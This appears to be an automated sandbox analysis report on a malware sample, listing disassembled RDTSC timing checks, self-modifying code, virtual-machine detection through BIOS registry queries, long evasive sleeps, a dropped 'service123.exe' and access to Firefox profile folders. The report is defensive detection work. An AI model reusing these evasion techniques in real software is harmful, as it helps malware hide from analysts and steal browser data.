Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1066 second address: 6EB109D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 jne 00007FF842B699FEh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007FF7D4C1B3ACh 0x00000020 pop esi 0x00000021 push edi 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB109D second address: 6EB10B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B433h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10B4 second address: 6EB10C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c movsx edi, cx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10C5 second address: 6EB10C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10C9 second address: 6EB10D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10D8 second address: 6EB10DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10DC second address: 6EB10E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10E0 second address: 6EB10E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10E6 second address: 6EB10EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10EC second address: 6EB10F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10F0 second address: 6EB10F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB10F4 second address: 6EB110F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx], eax 0x0000000a pushad 0x0000000b mov eax, edx 0x0000000d popad 0x0000000e mov eax, dword ptr [esi+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edi, cx 0x00000017 mov bx, ax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB110F second address: 6EB1114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1114 second address: 6EB1127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1127 second address: 6EB112D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB112D second address: 6EB1185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c jmp 00007FF7D4C1B436h 0x00000011 mov dword ptr [edx+08h], eax 0x00000014 jmp 00007FF7D4C1B430h 0x00000019 mov eax, dword ptr [esi+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FF7D4C1B42Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1185 second address: 6EB1194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1194 second address: 6EB11AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B434h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB11AC second address: 6EB11B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB11B0 second address: 6EB11D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ah, 36h 0x00000010 jmp 00007FF7D4C1B435h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB11D6 second address: 6EB11DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB11DC second address: 6EB11E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB11E0 second address: 6EB127A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b pushad 0x0000000c mov edi, 45672418h 0x00000011 call 00007FF7D4C1B3B1h 0x00000016 push ecx 0x00000017 pop ebx 0x00000018 pop esi 0x00000019 popad 0x0000001a mov dword ptr [edx+10h], eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FF7D4C1B3B9h 0x00000024 sub eax, 086FF866h 0x0000002a jmp 00007FF7D4C1B3B1h 0x0000002f popfd 0x00000030 movzx eax, bx 0x00000033 popad 0x00000034 mov eax, dword ptr [esi+14h] 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FF7D4C1B3B9h 0x0000003e sub ecx, 222E0876h 0x00000044 jmp 00007FF7D4C1B3B1h 0x00000049 popfd 0x0000004a push eax 0x0000004b push edx 0x0000004c mov dh, al 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB127A second address: 6EB1299 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 3EA8C8FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [edx+14h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF7D4C1B430h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1299 second address: 6EB12AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B3AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB12AB second address: 6EB1334 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b jmp 00007FF7D4C1B437h 0x00000010 mov dword ptr [edx+18h], eax 0x00000013 pushad 0x00000014 call 00007FF7D4C1B434h 0x00000019 mov ah, 67h 0x0000001b pop ebx 0x0000001c mov di, si 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+1Ch] 0x00000023 jmp 00007FF7D4C1B436h 0x00000028 mov dword ptr [edx+1Ch], eax 0x0000002b jmp 00007FF7D4C1B430h 0x00000030 mov eax, dword ptr [esi+20h] 0x00000033 jmp 00007FF7D4C1B430h 0x00000038 mov dword ptr [edx+20h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1334 second address: 6EB1351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1351 second address: 6EB1357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1357 second address: 6EB135B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB135B second address: 6EB137B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF7D4C1B431h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB137B second address: 6EB1390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1390 second address: 6EB13A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov cx, bx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB13A2 second address: 6EB13BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF7D4C1B3B0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB13BF second address: 6EB13C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB13C5 second address: 6EB13C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB13C9 second address: 6EB13EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF7D4C1B434h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB13EA second address: 6EB1422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 push edi 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [esi+2Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx ecx, bx 0x00000014 pushfd 0x00000015 jmp 00007FF7D4C1B3ADh 0x0000001a sub cl, 00000046h 0x0000001d jmp 00007FF7D4C1B3B1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1422 second address: 6EB14F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007FF7D4C1B42Eh 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 pushad 0x00000016 jmp 00007FF7D4C1B42Eh 0x0000001b pushad 0x0000001c call 00007FF7D4C1B430h 0x00000021 pop ecx 0x00000022 pushfd 0x00000023 jmp 00007FF7D4C1B42Bh 0x00000028 sub ax, 1B8Eh 0x0000002d jmp 00007FF7D4C1B439h 0x00000032 popfd 0x00000033 popad 0x00000034 popad 0x00000035 mov word ptr [edx+30h], ax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FF7D4C1B433h 0x00000042 adc al, FFFFFF9Eh 0x00000045 jmp 00007FF7D4C1B439h 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007FF7D4C1B430h 0x00000051 sbb ecx, 36B61398h 0x00000057 jmp 00007FF7D4C1B42Bh 0x0000005c popfd 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB14F6 second address: 6EB152F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d jmp 00007FF7D4C1B3AEh 0x00000012 mov word ptr [edx+32h], ax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB152F second address: 6EB1533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1533 second address: 6EB1539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1539 second address: 6EB15B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF7D4C1B432h 0x00000009 jmp 00007FF7D4C1B435h 0x0000000e popfd 0x0000000f jmp 00007FF7D4C1B430h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+34h] 0x0000001a pushad 0x0000001b mov al, D3h 0x0000001d pushfd 0x0000001e jmp 00007FF7D4C1B433h 0x00000023 adc al, 0000002Eh 0x00000026 jmp 00007FF7D4C1B439h 0x0000002b popfd 0x0000002c popad 0x0000002d mov dword ptr [edx+34h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB15B9 second address: 6EB15BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB15BD second address: 6EB15C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB15C3 second address: 6EB163F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF7D4C1B3B7h 0x00000009 sub ax, 23EEh 0x0000000e jmp 00007FF7D4C1B3B9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test ecx, 00000700h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FF7D4C1B3B3h 0x00000026 adc si, 89FEh 0x0000002b jmp 00007FF7D4C1B3B9h 0x00000030 popfd 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB163F second address: 6EB16E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF842B694E3h 0x0000000f jmp 00007FF7D4C1B436h 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF7D4C1B42Eh 0x0000001f xor al, FFFFFF88h 0x00000022 jmp 00007FF7D4C1B42Bh 0x00000027 popfd 0x00000028 call 00007FF7D4C1B438h 0x0000002d mov si, 8F01h 0x00000031 pop ecx 0x00000032 popad 0x00000033 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000037 pushad 0x00000038 call 00007FF7D4C1B433h 0x0000003d mov bx, ax 0x00000040 pop esi 0x00000041 mov si, dx 0x00000044 popad 0x00000045 or dword ptr [edx+40h], FFFFFFFFh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB16E0 second address: 6EB170B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF7D4C1B3B6h 0x0000000a sub cl, FFFFFFA8h 0x0000000d jmp 00007FF7D4C1B3ABh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB170B second address: 6EB1738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF7D4C1B42Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE0C72 second address: 6EE0C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE0C78 second address: 6EE0C9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF7D4C1B436h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE0C9E second address: 6EE0CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE0CA2 second address: 6EE0CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE0CBE second address: 6EE0CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF7D4C1B3B5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE0CE5 second address: 6EE0D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF7D4C1B42Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90B73 second address: 6E90B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop edi 0x0000000f mov ebx, eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90B90 second address: 6E90B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8648DB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8649E0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A14B8E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A88E89 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1674 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1722 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1745 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 6552 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6552 Thread sleep time: -96048s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6576 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6576 Thread sleep time: -100050s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6796 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6500 Thread sleep count: 1674 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6500 Thread sleep time: -3349674s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6548 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6548 Thread sleep time: -106053s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6528 Thread sleep count: 1722 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6528 Thread sleep time: -3445722s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6532 Thread sleep count: 1745 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6532 Thread sleep time: -3491745s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6508 Thread sleep count: 282 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2047749474.00000194D94A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
